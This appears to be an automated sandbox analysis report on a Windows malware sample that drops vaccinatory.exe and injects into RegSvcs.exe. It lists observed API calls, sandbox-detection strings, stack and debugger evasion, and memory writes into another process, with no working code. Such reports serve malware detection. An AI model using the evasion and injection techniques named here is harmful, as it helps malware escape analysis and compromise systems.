Code function: 1_2_001A3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_001A3187

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	API/Special instruction interceptor: Address: 1280C34
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	API/Special instruction interceptor: Address: 12631DC

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: tNXl4XhgmV.exe, 00000001.00000003.1282002550.0000000001154000.00000004.00000020.00020000.00000000.sdmp, tNXl4XhgmV.exe, 00000001.00000002.1290136214.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: vaccinatory.exe, 00000003.00000002.1312659705.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, vaccinatory.exe, 00000003.00000003.1290001338.0000000001293000.00000004.00000020.00020000.00000000.sdmp, vaccinatory.exe, 00000003.00000003.1290146791.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE RU
Source: vaccinatory.exe, 00000009.00000003.1414080412.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000002.1427617000.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1413936638.0000000001273000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE7J

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_1-103280
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	API coverage: 4.6 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_001E445A
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EC6D1 FindFirstFileW,FindClose,	1_2_001EC6D1
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_001EC75C
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_001EEF95
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_001EF0F2
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_001EF3F3
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_001E37EF
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_001E3B12
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_001EBCBC
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082445A GetFileAttributesW,FindFirstFileW,FindClose,	3_2_0082445A
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082C6D1 FindFirstFileW,FindClose,	3_2_0082C6D1
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_0082C75C
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_0082EF95
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_0082F0F2
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_0082F3F3
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_008237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_008237EF
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00823B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00823B12
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_0082BCBC

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_001849A0

Source: RegSvcs.exe, 00000004.00000002.2536969680.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: RegSvcs.exe, 0000000A.00000002.2537842735.0000000001127000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	API call chain: ExitProcess graph end node			graph_1-101571
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001F3F09 BlockInput,

1_2_001F3F09

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_00183B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00183B3A

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001B5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_001B5A7C

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_00184B37 LoadLibraryA,GetProcAddress,

1_2_00184B37

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_01162398 mov eax, dword ptr fs:[00000030h]	1_2_01162398
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_011639B8 mov eax, dword ptr fs:[00000030h]	1_2_011639B8
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_01163A18 mov eax, dword ptr fs:[00000030h]	1_2_01163A18
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0127F880 mov eax, dword ptr fs:[00000030h]	3_2_0127F880
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_01280F00 mov eax, dword ptr fs:[00000030h]	3_2_01280F00
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_01280EA0 mov eax, dword ptr fs:[00000030h]	3_2_01280EA0
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 9_2_012634A8 mov eax, dword ptr fs:[00000030h]	9_2_012634A8
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 9_2_01261E28 mov eax, dword ptr fs:[00000030h]	9_2_01261E28
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 9_2_01263448 mov eax, dword ptr fs:[00000030h]	9_2_01263448

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001D80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

1_2_001D80A9

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001AA124 SetUnhandledExceptionFilter,	1_2_001AA124
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_001AA155
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_007EA155
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007EA124 SetUnhandledExceptionFilter,	3_2_007EA124

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B8E008			Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CDD008			Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001D87B1 LogonUserW,

1_2_001D87B1

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_00183B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00183B3A

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

